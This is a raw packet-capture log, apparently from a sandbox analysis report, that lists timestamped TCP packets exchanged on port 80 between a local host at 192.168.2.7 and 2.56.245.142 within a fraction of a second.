Jun 5, 2024 18:28:36.478399992 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.478410959 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.478421926 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.478432894 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.478441000 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.478451014 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.478458881 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.478461027 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.478481054 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.478491068 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.478497982 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.478502035 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.478512049 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.478517056 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.478523016 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.478533983 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.478549004 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.479239941 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.479279041 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.479382992 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.479392052 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.479403019 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.479413986 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.479418993 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.479429007 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.479439020 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.479449987 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.479454041 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.479460955 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.479470968 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.479479074 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.479480982 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.479491949 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.479499102 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.479521036 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.480178118 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.480217934 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.593702078 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.593715906 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.593822002 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.593837023 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.593849897 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.593868971 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.593879938 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.593890905 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.593899965 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.593918085 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.593930006 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.593940973 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.593952894 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.594064951 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.594063997 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.594063997 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.594063997 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.594063997 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.594063997 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.594063997 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.594099998 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.594105959 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.594129086 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.594146013 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.594161987 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.594172955 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.594186068 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.594206095 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.594224930 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.594258070 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.594268084 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.594286919 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.594291925 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.594295979 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.594310999 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.594331980 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.594366074 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.594377995 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.594388962 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.594418049 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.594435930 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.594499111 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.594520092 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.594528913 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.594537973 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.594562054 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.594563007 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.594574928 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.594594955 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.594614029 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.594619036 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.594624996 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.594650984 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.594670057 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.594779968 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.594799042 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.594839096 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.594862938 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.594873905 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.594909906 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.594981909 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.594994068 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.595005035 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.595019102 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.595045090 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.595150948 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.595164061 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.595175028 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.595185995 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.595201969 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.595220089 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.595223904 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.595236063 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.595258951 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.595284939 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.595415115 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.595432043 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.595443010 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.595453978 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.595458984 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.595464945 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.595475912 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.595480919 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.595487118 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.595496893 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.595508099 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.595510006 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.595518112 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.595530033 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.595530033 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.595540047 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.595550060 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.595551968 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.595566988 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.595593929 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.598901033 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.598922968 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.598933935 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.598959923 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.598989010 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.599008083 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599019051 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599030972 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599041939 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599050999 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.599056959 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599066019 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599067926 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.599076986 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599087954 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.599113941 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.599122047 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599132061 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599143028 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599153042 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.599153996 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599185944 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.599193096 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599210024 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599217892 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.599225044 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599236012 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599246025 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599256992 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599257946 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.599292040 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.599311113 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.599668026 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599678040 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599689007 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599699974 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599715948 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.599735975 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.599783897 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599806070 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599816084 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.599839926 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.599877119 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599888086 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599905014 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599912882 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.599916935 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599930048 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.599936008 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599946976 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599947929 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.599957943 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599977016 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.599982977 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.599996090 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.599998951 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.600009918 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.600019932 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.600038052 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.600049973 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.600464106 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.600476027 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.600513935 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.600518942 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.600553036 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.600553036 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.600572109 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.600584030 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.600595951 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.600601912 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.600613117 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.600625038 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.600631952 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.600641966 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.600650072 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.600652933 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.600663900 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.600667000 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.600692987 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.600696087 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.600703001 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.600714922 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.600719929 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.600724936 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.600752115 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.600774050 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.601084948 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.601130962 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.601150036 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.601160049 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.601171970 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.601181984 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.601185083 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.601193905 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.601211071 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.601237059 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.711451054 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711467028 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711489916 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711493015 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711498976 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711560011 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711570978 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.711580038 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711592913 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.711592913 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711592913 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.711611032 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711622000 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711632013 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711637974 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.711643934 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711654902 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711666107 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711672068 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.711687088 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.711704969 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711733103 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.711743116 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.711772919 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711785078 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711796999 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711807013 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711817980 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711824894 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.711890936 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.711921930 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711932898 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711945057 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711954117 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711966038 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711971045 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711977959 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.711982012 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712003946 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712011099 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.712013960 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712028027 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712044001 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712055922 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712066889 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712076902 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712106943 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.712130070 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712177038 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.712202072 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.712248087 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712258101 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712268114 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712277889 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712291002 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712301016 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712301970 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.712311983 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712327957 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.712337017 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712362051 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712364912 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.712373018 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712378025 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.712398052 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.712456942 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.712460041 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712471008 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712490082 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712501049 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712512016 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.712512970 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712531090 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712537050 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.712543964 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712553978 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.712595940 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.712595940 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.712596893 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712609053 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712620020 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712630033 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712640047 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712652922 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712652922 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.712671995 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712682962 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712692976 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712697983 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712704897 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.712704897 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.712716103 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712722063 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712734938 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712753057 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712778091 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.712778091 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.712829113 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.712836027 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712944984 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712954998 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712968111 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712976933 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.712977886 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.712999105 CEST	49731	80	192.168.2.7	2.56.245.142
